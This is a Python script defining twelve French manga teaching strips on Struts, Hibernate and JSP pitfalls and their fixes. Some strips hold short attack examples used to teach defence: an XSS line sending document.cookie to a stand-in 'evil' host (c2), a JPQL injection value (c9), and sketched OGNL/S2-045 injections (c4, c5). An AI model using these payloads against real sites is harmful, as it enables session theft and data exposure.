"""Planches manga du cours Struts, Hibernate et JSP (12 chapitres). Usage : python3 manga15.py <page>"""
import sys, pathlib
sys.path.insert(0, str(pathlib.Path(__file__).parent))
from manga_gabarit import strip3, apply
F = lambda *a: strip3(*a)
N = dict(rack=False, nuit=False)
STRIPS = [
 ("c1", F("mgs1", "F5 recrée l'incident", "Struts 1",
   dict(term=["doPost(…) {", "  service.create(req…);", "  forward(\"/incidents.jsp\"); }"], bulle=["La liste", "s'affiche,", "parfait."]),
   dict(term=["l'utilisateur appuie sur F5", "« renvoyer le formulaire ? »", "incident créé deux fois"], **N, who='mika', expr='shock', sfx="×2"),
   "Post, Redirect, Get", ["après un POST : sendRedirect", "la page affichée vient d'un GET", "F5 ne recrée rien"],
   "Un forward après un POST laisse le formulaire en mémoire du navigateur : on redirige après chaque POST (PRG), et un rafraîchissement ne refait que le GET.")),
 ("c2", F("mgs2", "${} n'échappe rien", "Struts 2",
   dict(term=["<p>Résultats pour", "  ${param.q}</p>"], bulle=["L'EL, c'est", "propre et court."]),
   dict(term=["?q=<script>fetch(evil+", "  document.cookie)</script>", "cookie de session volé"], sfx="XSS"),
   "échapper toute sortie", ["<c:out value='${param.q}'/>", "fn:escapeXml dans les attributs", "CSP, cookie HttpOnly", "scriptlets interdits"],
   "En JSP, ${…} insère la valeur telle quelle : toute donnée venant de l'utilisateur passe par c:out ou fn:escapeXml, avec une CSP et des cookies HttpOnly en renfort.")),
 ("c3", F("mgs3", "le devMode oublié", "Struts 3",
   dict(term=["struts.xml :", "  struts.devMode = true", "# pratique pour déboguer"], bulle=["Je l'enlèverai", "avant la prod."]),
   dict(term=["en production :", "  ?debug=console", "  console OGNL ouverte à tous"], sfx="OGNL"),
   "fermer le mode développeur", ["devMode = false en production", "profil de configuration par env", "test : ?debug= → 404", "revue du struts.xml"],
   "Le mode développeur de Struts expose une console d'évaluation OGNL : il est désactivé en production, et un test automatique vérifie que le paramètre debug ne répond pas.")),
 ("c4", F("mgs4", "un nom de paramètre qui exécute", "Struts 4",
   dict(term=["<param name='excludeParams'>", "  </param>  <!-- vidé -->", "« ça bloquait un champ »"], bulle=["Un champ ne", "passait pas."]),
   dict(term=["?class.classLoader…=", "  expression OGNL", "code exécuté sur le serveur"], sfx="RCE"),
   "garder les garde-fous", ["excludeParams par défaut", "allowStaticMethodAccess=false", "renommer le champ plutôt", "Struts à jour"],
   "L'intercepteur params évalue les noms de paramètres : ses listes d'exclusion empêchent d'atteindre le contexte ; on renomme un champ plutôt que de vider ces protections.")),
 ("c5", F("mgs5", "le Content-Type d'Equifax", "Struts 5",
   dict(term=["struts2-core 2.3.31", "  en production depuis 2016", "  « ça marche, on n'y touche pas »"], bulle=["Pas de bug,", "pas de mise", "à jour."]),
   dict(term=["Content-Type: %{(#…)}", "  (S2-045)", "shell sur le serveur"], sfx="S2-045"),
   "mettre à jour, vite", ["dependency-check bloquant en CI", "avis S2-xxx suivis", "WAF en attendant le correctif", "Struts 6.x"],
   "Une version de Struts jamais mise à jour finit par croiser une faille publique : les avis de sécurité sont suivis, la CI bloque les CVE connues, et un WAF couvre le temps du correctif.")),
 ("c6", F("mgs6", "tout réécrire d'un coup", "Struts 6",
   dict(term=["Struts 1 : 240 écrans", "plan : tout réécrire", "  en Spring, livraison unique"], bulle=["Dix-huit mois", "et on repart", "propre."]),
   dict(term=["mois 18 : 60 % réécrit", "le métier a changé entre-temps", "projet arrêté"], **N, who='kai', expr='shock', sfx="stop"),
   "étrangler le legacy", ["sécuriser d'abord (filtre, WAF)", "extraire les services métier", "remplacer écran par écran", "tests de caractérisation"],
   "Une réécriture complète court après un métier qui bouge : on sécurise l'existant, on extrait les services, puis on remplace les écrans un par un derrière le même point d'entrée.")),
 ("c7", F("mgs7", "update en production", "Hibernate 7",
   dict(term=["hibernate.hbm2ddl.auto", "  = update", "# le schéma suit le code"], bulle=["Plus besoin", "de scripts SQL."]),
   dict(term=["colonne renommée dans l'entité :", "  nouvelle colonne vide créée", "  l'ancienne toujours là"], **N, who='mika', expr='angry', pose='hips', sfx="?"),
   "le schéma se migre", ["Flyway : migrations versionnées", "hbm2ddl.auto = validate", "revue de chaque migration", "expand / contract"],
   "hbm2ddl update ajoute sans jamais supprimer ni renommer correctement : le schéma se migre avec Flyway, relu et versionné, et Hibernate se contente de valider.")),
 ("c8", F("mgs8", "401 requêtes pour une liste", "Hibernate 8",
   dict(term=["select i from Incident i", "for (i : xs) i.getZone()", "  .getNom()"], bulle=["Une requête,", "une boucle."]),
   dict(term=["200 incidents affichés :", "  1 + 200 + 200 requêtes", "page : 3,8 s"], sfx="401"),
   "compter les requêtes", ["join fetch sur la zone", "batch ou subselect sur listes", "projection DTO si lecture", "test qui borne le nombre"],
   "Chaque accès paresseux dans une boucle déclenche une requête : join fetch, batch fetching ou projection DTO, et un test qui borne le nombre de requêtes par écran.")),
 ("c9", F("mgs9", "la requête concaténée", "Hibernate 9",
   dict(term=["em.createQuery(", "  \"… where i.titre = '\"", "  + titre + \"'\")"], bulle=["C'est du JPQL,", "pas du SQL."]),
   dict(term=["titre = x' or '1'='1", "tous les incidents", "  de tous les clients"], sfx="injection"),
   "des paramètres, toujours", ["where i.titre = :titre", "setParameter(\"titre\", titre)", "Criteria pour le dynamique", "grep de concaténation en CI"],
   "JPQL concaténé est injectable comme du SQL : les valeurs passent toujours par des paramètres nommés, et les filtres dynamiques par Criteria.")),
 ("c10", F("mgs10", "deux clics, une mise à jour perdue", "Hibernate 10",
   dict(term=["Léa et Sam ouvrent", "  l'incident 42", "entité sans @Version"], bulle=["Chacun corrige", "son champ."]),
   dict(term=["Sam enregistre, puis Léa", "la version de Léa écrase", "  celle de Sam, sans erreur"], **N, who='mika', expr='shock', sfx="perdu"),
   "verrou optimiste", ["@Version int version", "where version = ? → 0 ligne", "OptimisticLockException", "message ou nouvelle tentative"],
   "Sans version, le dernier qui enregistre efface l'autre sans le savoir : @Version fait échouer la seconde mise à jour, et l'application prévient ou réessaie.")),
 ("c11", F("mgs11", "la session ouverte jusqu'à la vue", "Hibernate 11",
   dict(term=["spring.jpa.open-in-view", "  = true   (défaut)", "« pas de LazyInitialization »"], bulle=["Plus d'erreurs", "lazy, génial."]),
   dict(term=["la vue parcourt les relations", "  N+1 invisibles en dev", "pool épuisé en charge"], sfx="pool"),
   "charger dans la transaction", ["open-in-view = false", "le service charge ce qu'il faut", "EntityGraph ou DTO", "la vue ne touche plus la base"],
   "L'Open Session In View garde la connexion pendant le rendu et cache les N+1 : on le désactive, et le service charge exactement ce dont la vue a besoin.")),
 ("c12", F("mgs12", "réciter ne suffit pas", "Struts 12",
   dict(term=["entretien :", "  « @OneToMany, @ManyToOne,", "  @JoinColumn, mappedBy… »"], bulle=["Je connais", "toutes les", "annotations."]),
   dict(term=["recruteur : « combien de", "  requêtes fait votre écran", "  liste ? »  … silence"], **N, who='kai', expr='shock', sfx="…"),
   "raconter une mesure", ["une histoire STAR", "avant : 401 requêtes, 3,8 s", "après : 2 requêtes, 60 ms", "ce que j'ai appris"],
   "En entretien, une histoire mesurée vaut mieux qu'une liste d'annotations : le problème, la mesure avant, la correction, la mesure après, et la leçon.")),
]
if __name__ == '__main__': apply(sys.argv[1], STRIPS)
